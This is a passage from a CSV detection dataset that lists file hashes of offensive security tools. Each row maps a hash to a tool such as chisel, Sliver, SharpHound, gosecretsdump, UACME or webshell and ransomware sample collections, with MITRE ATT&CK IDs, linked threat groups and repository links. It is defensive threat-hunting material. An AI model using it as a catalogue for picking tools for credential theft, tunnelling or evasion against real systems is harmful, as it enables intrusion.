SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","0","#filehash","N/A","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","28231" "*6881a17bb0b124e295cfbf2fae1165babe35a3dda065dd246dad52b107ef3252*",".{0,1000}6881a17bb0b124e295cfbf2fae1165babe35a3dda065dd246dad52b107ef3252.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28235" "*688332c4667e6d6e605356fbf205017a7dc9a86731d9fd95beb2562df3bc754b*",".{0,1000}688332c4667e6d6e605356fbf205017a7dc9a86731d9fd95beb2562df3bc754b.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","28236" "*68893940dc6f3230bb1e6fccf92c698bd7445de283e0d5739336b8b7e471f6a9*",".{0,1000}68893940dc6f3230bb1e6fccf92c698bd7445de283e0d5739336b8b7e471f6a9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28237" "*688dc9d39588279c2872574aceba8950660824d3f0b91c1c50e1be065b891f77*",".{0,1000}688dc9d39588279c2872574aceba8950660824d3f0b91c1c50e1be065b891f77.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28238" "*68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1*",".{0,1000}68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28241" "*68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615*",".{0,1000}68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - 
T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28242" "*68c44d30bb996caf2202e1664ab8dfc5ddb6d20b1b01f06864c58df3ab06225a*",".{0,1000}68c44d30bb996caf2202e1664ab8dfc5ddb6d20b1b01f06864c58df3ab06225a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28248" "*68c964dff60cd2699cca31430d7ebd494cfc9442a7351512316a4467e19266cd*",".{0,1000}68c964dff60cd2699cca31430d7ebd494cfc9442a7351512316a4467e19266cd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28249" "*68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3*",".{0,1000}68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash 
#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28250" "*68d8cccac7dcacea5a989ca47bd46f153d368cec93991fa8e3a1c950fec75508*",".{0,1000}68d8cccac7dcacea5a989ca47bd46f153d368cec93991fa8e3a1c950fec75508.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28252" "*68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9*",".{0,1000}68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28253" "*68db60666c1168286b8cc21049d8cfe4*",".{0,1000}68db60666c1168286b8cc21049d8cfe4.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","28254" 
"*68ddd5703d6205313549d3828eeca64f383f297c43f65398f9a30637c07ef153*",".{0,1000}68ddd5703d6205313549d3828eeca64f383f297c43f65398f9a30637c07ef153.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#filehash","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","28255" "*68e3b0998d4950b98379f5c42a3d1e317af5c3ff22878e9b569a563cf28d78e5*",".{0,1000}68e3b0998d4950b98379f5c42a3d1e317af5c3ff22878e9b569a563cf28d78e5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28256" "*68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a*",".{0,1000}68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28257" "*68e8b94f99f449c2b03f908cc77399831c145d289e18f18fe21cffc4010021ca*",".{0,1000}68e8b94f99f449c2b03f908cc77399831c145d289e18f18fe21cffc4010021ca.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28259" "*68f5943f82cca6e744c5a2f28bf3f7b77109007c5e215e99b1587b20d0f1bae0*",".{0,1000}68f5943f82cca6e744c5a2f28bf3f7b77109007c5e215e99b1587b20d0f1bae0.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28260" "*68f88c6f39dea0b385af37b957b9a55ad766a079d53a03deaee5a44790ce62cf*",".{0,1000}68f88c6f39dea0b385af37b957b9a55ad766a079d53a03deaee5a44790ce62cf.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS 
spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","28261" "*6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b*",".{0,1000}6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","28262" "*69058ca0c4eada431047c0376db8a4728feffbacebbb9578e59f4c9113a342ca*",".{0,1000}69058ca0c4eada431047c0376db8a4728feffbacebbb9578e59f4c9113a342ca.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","28263" "*690a75c3c6d282677102073f6bc64c4f8a13771aa052497ba02ca19a6de56f8a*",".{0,1000}690a75c3c6d282677102073f6bc64c4f8a13771aa052497ba02ca19a6de56f8a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28264" "*690b998d1f9a9f3b67f8a78771f9c88ad5455c2b0150c92b2960fa69f196f660*",".{0,1000}690b998d1f9a9f3b67f8a78771f9c88ad5455c2b0150c92b2960fa69f196f660.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","28265" "*690e0cc55db7e3d5de7a62b4a20fdfae8c7a66c1218d57efe9d432521c031ecb*",".{0,1000}690e0cc55db7e3d5de7a62b4a20fdfae8c7a66c1218d57efe9d432521c031ecb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28267" "*691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e*",".{0,1000}691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","28271" "*692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda*",".{0,1000}692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","#filehash","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","28272" "*6922df4a3bd7d41b985342abc5ee2ee292912d993d6adfebfa8acd04cddcea58*",".{0,1000}6922df4a3bd7d41b985342abc5ee2ee292912d993d6adfebfa8acd04cddcea58.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28273" "*6936c267e3cbb3bb7f418e26594bbf7367b7d2c8de6ad5d0e88c2cb3485dfcd9*",".{0,1000}6936c267e3cbb3bb7f418e26594bbf7367b7d2c8de6ad5d0e88c2cb3485dfcd9.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28279" "*6938eff2dc2ec73ed1fa0c5b70827ecf2ea031a8486eda7f7f72ad3da4576b25*",".{0,1000}6938eff2dc2ec73ed1fa0c5b70827ecf2ea031a8486eda7f7f72ad3da4576b25.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","28280" 
"*694d48564fd66f3c0647a5602f36d2e92cf6ed1291b413232816811e57b37320*",".{0,1000}694d48564fd66f3c0647a5602f36d2e92cf6ed1291b413232816811e57b37320.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28281" "*694eb99d38f28ec564d480cdd05e3b6e703b2c0d592276322e7a74602145a5c1*",".{0,1000}694eb99d38f28ec564d480cdd05e3b6e703b2c0d592276322e7a74602145a5c1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28283" "*694f8c09de24e9b4b6b438020fea1d56c9941e9a2036d43dee282749a90989be*",".{0,1000}694f8c09de24e9b4b6b438020fea1d56c9941e9a2036d43dee282749a90989be.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28284" "*6952343cc4614857f83dbb81247871e7*",".{0,1000}6952343cc4614857f83dbb81247871e7.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","28285" "*695d04c8162644e98cb0e68926b1cc9f47398e0ddd86255453c26b7619c88f10*",".{0,1000}695d04c8162644e98cb0e68926b1cc9f47398e0ddd86255453c26b7619c88f10.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","#filehash","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","28289" "*6964922451227f135e3fce39838f13ba80c0a53e32cd2b66132fb406e1e68411*",".{0,1000}6964922451227f135e3fce39838f13ba80c0a53e32cd2b66132fb406e1e68411.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28290" "*696f4e32bb16f60bee96bab7207e393b554bd64795e2be9ce857845c5b886886*",".{0,1000}696f4e32bb16f60bee96bab7207e393b554bd64795e2be9ce857845c5b886886.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28291" 
"*69720fc90a8dca0c2ff3f33a59042ae0a6ddedd64d5fafefbc43583aa770e175*",".{0,1000}69720fc90a8dca0c2ff3f33a59042ae0a6ddedd64d5fafefbc43583aa770e175.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","28294" "*697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306*",".{0,1000}697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28295" "*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*",".{0,1000}6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","28296" "*6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d*",".{0,1000}6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28297" "*69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80*",".{0,1000}69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28298" "*6985cca5e98eaddf1cde30a918ebfa8ebd6be892df518232b3a0b63e29043df2*",".{0,1000}6985cca5e98eaddf1cde30a918ebfa8ebd6be892df518232b3a0b63e29043df2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28300" "*698fc52837dab69301c96949a3514845f16a6b3c2a8faf14b08ce80c4c575f2e*",".{0,1000}698fc52837dab69301c96949a3514845f16a6b3c2a8faf14b08ce80c4c575f2e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28303" "*69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41*",".{0,1000}69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28305" "*69964da9297a1caaa4ba0c389d4ba8a97f14d9a58cdb1cb549525ffa9684529c*",".{0,1000}69964da9297a1caaa4ba0c389d4ba8a97f14d9a58cdb1cb549525ffa9684529c.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","28306" "*6997588d3c194d5a1d3c32ae3e2fe1475374dfe0c5845485d550796440621bbb*",".{0,1000}6997588d3c194d5a1d3c32ae3e2fe1475374dfe0c5845485d550796440621bbb.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28307" "*6997ce0fe65943279981c444857b406b20ebe1736442c6f4c75dae0dbd7c9549*",".{0,1000}6997ce0fe65943279981c444857b406b20ebe1736442c6f4c75dae0dbd7c9549.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28308" "*69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f*",".{0,1000}69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","28312" "*69ab4c2375c28b0520090c3ce7c3f033d5429aee8a0ef2f7b5f54edee2a759b7*",".{0,1000}69ab4c2375c28b0520090c3ce7c3f033d5429aee8a0ef2f7b5f54edee2a759b7.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of 
